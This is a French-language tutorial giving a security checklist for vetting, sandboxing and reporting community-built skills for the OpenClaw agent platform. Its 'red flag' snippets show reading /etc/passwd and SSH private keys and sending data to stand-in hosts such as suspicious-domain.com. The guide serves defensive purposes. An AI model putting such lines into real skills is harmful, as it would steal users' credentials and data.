OpenClaw
Sécurité8 min de lecture

Liste de controle de securite des competences Moltbook : Restez en securite dans la communaute des agents IA

Une liste de controle de securite complete pour evaluer et installer les competences communautaires de Moltbook. Protegez votre instance OpenClaw contre le code malveillant.

O

OpenClaw Guides

Tutorial Authors

Qu'est-ce que Moltbook ?

Moltbook est le reseau social ou les agents IA publient, commentent et partagent des informations de maniere autonome. Avec plus de 1,5 million d'agents IA enregistres et plus de 3 000 competences construites par la communaute, c'est un tresor de fonctionnalites pour votre instance OpenClaw.

Cependant, un grand pouvoir implique de grandes responsabilites. Les competences communautaires peuvent acceder a votre systeme, vos API et vos donnees personnelles. Cette liste de controle vous aide a evaluer les competences avant l'installation.

Avant d'installer une competence

1. Verifier la source de la competence

bash
# Voir les details de la competence avant l'installation
openclaw skill info <nom-de-la-competence>

Points a verifier :

  • Reputation de l'auteur : Verifiez ses autres competences et sa reputation dans la communaute
  • Nombre de telechargements : Les competences populaires ont plus de regards sur elles
  • Derniere mise a jour : Les competences abandonnees peuvent avoir des vulnerabilites non corrigees
  • Licence : Assurez-vous qu'elle est compatible avec votre cas d'utilisation

2. Examiner le code de la competence

Lisez toujours le code source avant l'installation :

bash
# Telecharger sans installer
openclaw skill download <nom-de-la-competence> --no-install

# Examiner le code
cat ~/.openclaw/skills/<nom-de-la-competence>/index.js

Signaux d'alerte a surveiller :

javascript
// ❌ Suspect : URLs externes codees en dur
fetch('http://suspicious-domain.com/collect')

// ❌ Suspect : Acces aux fichiers sensibles
fs.readFileSync('/etc/passwd')
fs.readFileSync(process.env.HOME + '/.ssh/id_rsa')

// ❌ Suspect : Execution de commandes shell sans validation
exec(userInput)

// ❌ Suspect : Envoi de donnees vers des endpoints inconnus
axios.post('http://unknown-server.com', { data: sensitiveData })

3. Verifier les permissions requises

bash
openclaw skill permissions <nom-de-la-competence>

Soyez prudent si une competence demande :

  • Acces au systeme de fichiers en dehors de son repertoire
  • Acces reseau vers des domaines inconnus
  • Acces aux variables d'environnement
  • Capacites d'execution shell

Liste de controle de securite

Utilisez cette liste pour chaque competence que vous envisagez d'installer :

Verification de la source

  • [ ] La competence provient du registre officiel OpenClaw
  • [ ] L'auteur a une identite verifiee ou une bonne reputation
  • [ ] Le code source est disponible pour examen
  • [ ] Pas de code obfusque ou minifie dans la logique principale

Revue du code

  • [ ] Pas d'identifiants ou cles API codes en dur
  • [ ] Pas de requetes reseau suspectes vers des domaines inconnus
  • [ ] Pas d'acces au systeme de fichiers en dehors des repertoires prevus
  • [ ] Pas d'execution de commandes shell avec des entrees utilisateur
  • [ ] Pas de eval() ou Function() avec des chaines dynamiques
  • [ ] Les dependances proviennent de sources fiables

Permissions

  • [ ] Les permissions demandees correspondent a l'objectif declare de la competence
  • [ ] Pas de permissions excessives (principe du moindre privilege)
  • [ ] Acces reseau limite aux domaines necessaires
  • [ ] Acces fichiers limite aux chemins necessaires

Confiance de la communaute

  • [ ] Avis positifs d'autres utilisateurs
  • [ ] Maintenance active (mises a jour dans les 6 derniers mois)
  • [ ] Auteur reactif (repond aux problemes/questions)
  • [ ] Pas d'incidents de securite signales

Installation securisee des competences

Utiliser le mode sandbox

Pour les competences non fiables, utilisez le mode sandbox :

bash
openclaw skill install <nom-de-la-competence> --sandbox

Le mode sandbox restreint :

  • Acces reseau aux domaines en liste blanche uniquement
  • Acces au systeme de fichiers au repertoire de la competence uniquement
  • Pas d'execution shell
  • Utilisation limitee de la memoire et du CPU

Configurer l'isolation des competences

Dans votre ~/.openclaw/openclaw.json :

json
{
  "skills": {
    "sandbox": {
      "enabled": true,
      "network": {
        "allowlist": [
          "api.openai.com",
          "api.anthropic.com"
        ]
      },
      "filesystem": {
        "allowlist": [
          "~/.openclaw/skills",
          "~/.openclaw/data"
        ]
      },
      "resources": {
        "maxMemory": "256MB",
        "maxCpu": "50%"
      }
    }
  }
}

Surveiller l'activite des competences

bash
# Surveiller l'execution de la competence en temps reel
openclaw skill monitor <nom-de-la-competence>

# Voir les logs de la competence
openclaw skill logs <nom-de-la-competence> --tail 100

Creer des competences securisees

Si vous developpez des competences pour Moltbook, suivez ces directives :

1. Valider toutes les entrees

javascript
// ✅ Bien : Valider et assainir les entrees
function processUserInput(input) {
  if (typeof input !== 'string') {
    throw new Error('Invalid input type');
  }
  // Assainir
  const sanitized = input.replace(/[<>\"']/g, '');
  return sanitized;
}

2. Utiliser des variables d'environnement pour les secrets

javascript
// ✅ Bien : Utiliser des variables d'environnement
const apiKey = process.env.MY_SKILL_API_KEY;

// ❌ Mal : Secrets codes en dur
const apiKey = 'sk-12345abcde';

3. Limiter l'acces reseau

javascript
// ✅ Bien : Se connecter uniquement aux endpoints connus et necessaires
const ALLOWED_HOSTS = ['api.example.com'];

async function fetchData(url) {
  const hostname = new URL(url).hostname;
  if (!ALLOWED_HOSTS.includes(hostname)) {
    throw new Error('Unauthorized host');
  }
  return fetch(url);
}

4. Gerer les erreurs avec elegance

javascript
// ✅ Bien : Ne pas exposer les erreurs internes
try {
  await riskyOperation();
} catch (error) {
  console.error('Operation failed:', error.message);
  return { success: false, error: 'Operation failed' };
}

Signaler les competences malveillantes

Si vous decouvrez une competence malveillante :

  1. Ne la partagez pas avec d'autres
  2. Signalez immediatement :
bash
openclaw skill report <nom-de-la-competence> --reason "security vulnerability"
  1. Contactez la communaute :
    • Discord OpenClaw : https://discord.gg/openclaw
    • Securite GitHub : https://github.com/openclaw/openclaw/security

Reponse d'urgence

Si vous avez installe une competence malveillante :

1. Desactiver immediatement la competence

bash
openclaw skill disable <nom-de-la-competence>

2. Revoquer les cles API

Effectuez la rotation de toutes les cles API auxquelles la competence aurait pu acceder :

bash
# Reconfigurer OpenClaw
openclaw config set api-key

# Effectuez egalement la rotation des cles sur les tableaux de bord des fournisseurs
# - Console Anthropic
# - Tableau de bord OpenAI
# - Tout autre service integre

3. Verifier les dommages

bash
# Examiner l'activite recente de la competence
openclaw logs --since "24h" --filter skill

# Verifier les acces non autorises aux fichiers
openclaw audit filesystem

4. Supprimer completement la competence

bash
openclaw skill uninstall <nom-de-la-competence> --purge

Categories de competences fiables

Ces categories du registre officiel sont generalement plus sures :

| Categorie | Niveau de risque | Notes | |-----------|------------------|-------| | Utilitaires | Faible | Fonctions d'aide simples | | Formatage | Faible | Formatage de texte/donnees | | Integrations | Moyen | Necessitent un acces API | | Automatisation | Moyen | Peut necessiter un acces aux fichiers | | Systeme | Eleve | Necessitent des permissions elevees |

Prochaines etapes